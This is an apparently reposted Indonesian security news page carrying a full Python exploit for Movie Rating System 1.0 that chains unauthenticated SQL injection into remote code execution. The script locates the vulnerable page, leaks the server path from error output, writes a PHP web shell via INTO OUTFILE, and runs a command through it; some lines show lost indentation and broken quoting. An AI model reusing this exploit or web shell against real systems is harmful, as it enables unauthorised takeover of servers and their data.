Sistem Peringkat Film 1.0 Injeksi SQL / Eksekusi Kode

  • Whatsapp
Sistem Peringkat Film 1.0 Injeksi SQL / Eksekusi Kode
Sistem Peringkat Film Injeksi SQL Eksekusi Kode

News.nextcloud.asia

Movie Rating System versi 1.0 mengalami kerentanan injeksi SQL jarak jauh yang memungkinkan penyerang meningkatkan eksekusi kode jarak jauh.

MD5 | 491fb40d4c23f9004cab9584a482c0e8

# Exploit Title: Movie Rating System 1.0 - SQLi to RCE (Unauthenticated)
# Date: 22/12/2021
# Exploit Author: Tagoletta (Tağmaç)
# Software Link: https://www.sourcecodester.com/php/15104/sentiment-based-movie-rating-system-using-phpoop-free-source-code.html
# Version: 1.0
# Tested on: Ubuntu
# This exploit only works correctly if user is database administrator. if not user is database administrator, continue with sql injection payloads.

import requests
import random
import string
from bs4 import BeautifulSoup

url = input("TARGET = ")

if not url.startswith('http://') and not url.startswith('https://'):
url = "http://" + url
if not url.endswith('/'):
url = url + "/"

payload = "<?php if(isset($_GET['tago'])){ $cmd = ($_GET['tago']); system($cmd); die; } ?>"

let = string.ascii_lowercase
shellname="".join(random.choice(let) for i in range(15))

resp = requests.get(url)
htmlParser = BeautifulSoup(resp.text, 'html.parser')

getMenu = htmlParser.findAll("a", {"class": "nav-link"})
selectPage = ""
for i in getMenu:
if "movie" in i.text.lower():
selectPage = i["href"]
break

selectPage = selectPage.replace("./","")
findSql = url + selectPage
resp = requests.get(findSql)
htmlParser = BeautifulSoup(resp.text, 'html.parser')
movieList = htmlParser.findAll("a", {"class" : "card card-outline card-primary shadow rounded-0 movie-item text-decoration-none text-dark"})

sqlPage = movieList[0]["href"]
sqlPage = sqlPage.replace("./","")

sqlPage = url + sqlPage

print("nFinding path")

findPath = requests.get(sqlPage + ''')
findPath = findPath.text[findPath.text.index("<b>Warning</b>: ")+17:findPath.text.index("</b> on line ")]
findPath = findPath[findPath.index("<b>")+3:len(findPath)]
print("injection page: "+sqlPage)

parser = findPath.split('\')
parser.pop()
findPath = ""
for find in parser:
findPath += find + "/"

print("nFound Path : " + findPath)

SQLtoRCE = "-1881' OR 1881=1881 LIMIT 0,1 INTO OUTFILE '#PATH#' LINES TERMINATED BY #PAYLOAD# -- -"
SQLtoRCE = SQLtoRCE.replace("#PATH#",findPath+shellname+".php")
SQLtoRCE = SQLtoRCE.replace("#PAYLOAD#", "0x3"+payload.encode("utf-8").hex())

print("nnShell Uploading...")
status = requests.get(sqlPage+SQLtoRCE)

shellOutput = requests.get(url+shellname+".php?tago=whoami")
print("nnShell Output : "+shellOutput.text)
print("nShell Path : " + url+shellname+".php")

Pos terkait

Tinggalkan Balasan

Alamat email Anda tidak akan dipublikasikan.